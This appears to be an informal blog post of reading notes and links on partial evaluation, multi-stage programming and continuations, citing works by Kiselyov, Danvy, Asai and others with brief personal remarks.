Typed Template Haskell gives you similar capabilities if that is more of your jam https://www.philipzucker.com/a-little-bloop-on-typed-template-haskell/

The MetaOcaml book – Kiselyov http://okmij.org/ftp/meta-programming/tutorial/index.html

http://okmij.org/ftp/tagless-final/JFP.pdf Finally Tagless, Partially Evaluated is a paper I come back to. This is both because the subject matter is interesting, it seems to hold insights, and that it is quite confusing and long. I think there are entangled objectives occurring, chronologically this may be an early exposition of finally tagless style, for which it is not the most pedagogical reference.

Jason Gross, Chlipala, others? . Coq partial evaluation. Once you go into plugin territory it’s a different game though. https://people.csail.mit.edu/jgross/personal-website/papers/2020-rewriting-popl-draft.pdf

Partial Evaluation book – Jones Sestoft Gomard https://www.itu.dk/people/sestoft/pebook/jonesgomardsestoft-a4.pdf

Nada Amin, Tiark Rompf. Two names to know https://scala-lms.github.io/ scala partial evaluation system https://www.youtube.com/watch?v=QuJ-cEvH_oI

Strymonas – a staged streaming library https://strymonas.github.io/

Algebraic staged parsing – https://www.cl.cam.ac.uk/~nk480/parsing.pdf

Nielson and Nielson – Two level functional languages book

https://dl.acm.org/doi/10.1145/141478.141483 – Improving binding times without explicit CPS-conversion. This bondorf paper is often cited as the why CPS helps partial evaluation paper

Modal logic. Davies and Pfenning. Was a hip topic. Their modal logic is something a bit like metaocaml. “Next” stage has some relationship to Next modal operator. Metaocaml as a proof language for intuitinisitc modal logic.

Partial evaluation vs optimizing compilers. It is known that CPS tends to allow the internals of compilers to make more optimizations. The obvious optimizations performed by a compiler often correspond to simple partial evaluations. Perhaps to get a feeling for where GHC gets blocked, playing around with an explicit partial evaluation system is useful.

An unrolled power in julia. It is unlikely I suspect that you want to use this technique to achieve performance goals. The Julia compiler itself is probably smarter than you unless you’ve got some real secret sauce.

continuations and partial evaluation are like jam and peanut butter.

I’ve been digging into the continuation literature a bit

William byrd call/cc tutorial https://www.youtube.com/watch?v=2GfFlfToBCo

Kenichi Asai – Delimitted continuations for everyone https://www.youtube.com/watch?v=QNM-njddhIw

- http://okmij.org/ftp/continuations/
- http://blog.sigfpe.com/2008/12/mother-of-all-monads.html
- https://gist.github.com/lexi-lambda/d97b8187a9b63619af29689e9fa1b880
- https://www.cs.utah.edu/plt/publications/icfp07-fyff.pdf

Which of the many Danvy papers is most relevant

- Defunctionalization and refunctionalization – Defunctionalize the continuation, see Jimmy’s talk https://dl.acm.org/doi/abs/10.1145/773184.773202 and
- http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.6.2739&rep=rep1&type=pdf Continuation based partial evaluations 1995
- https://dl.acm.org/doi/pdf/10.1145/91556.91622 1990 abstracting control
- Abstract machines = Evaluators https://dl.acm.org/doi/pdf/10.1145/888251.888254 Functional correspondence 2003
- https://www.researchgate.net/profile/Olivier_Danvy/publication/226671340_The_essence_of_eta-expansion_in_partial_evaluation/links/00b7d5399ecf37a658000000/The-essence-of-eta-expansion-in-partial-evaluation.pdf Essence of Eta expansion (1995) Reference of “the trick”
- Representing control (1992) https://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.46.84&rep=rep1&type=pdf Explains plotkin translation of CPS carefully. How to get other operators

Names to look out for: Dybvig, Felleison, Oleg, Filinksi, Asai, Danvy, Sabry

https://github.com/rain-1/continuations-study-group/wiki/Reading-List Great reading list

What are the most interesting Oleg sections.

CPS. Really this is converting a syntax tree of lambda calculus to one of another type. This other type can be lowered back down to lambda calculus.

Control constructs can fill in holes in the CPS translation.

Evaluation context. Contexts are terms with a single hole. Variables can also be used to show holes so therein lies some ocnfusion.

Abstract Machines

Ben pointed out that Node is in continuation passing style

To what degree are monads and continuations related? http://hjemmesider.diku.dk/~andrzej/papers/RM-abstract.html Mother of all monads.

Certainly error handling and escape are possible with continuation

Call-cc is as if the compiler converts to cps, and then call-cc grabs the continuation for you

call-cc allows you to kind of pull a program inside out. It’s weird.

Compiling to continuations book

Lisp in Small Pieces

CPSing a value x ~ \f -> f x.

https://homepages.inf.ed.ac.uk/wadler/papers/papers-we-love/reynolds-discoveries.pdf – The discoveries of continuations – Reynolds. Interesting bit of history about the discovery in the 60s/70s

]]>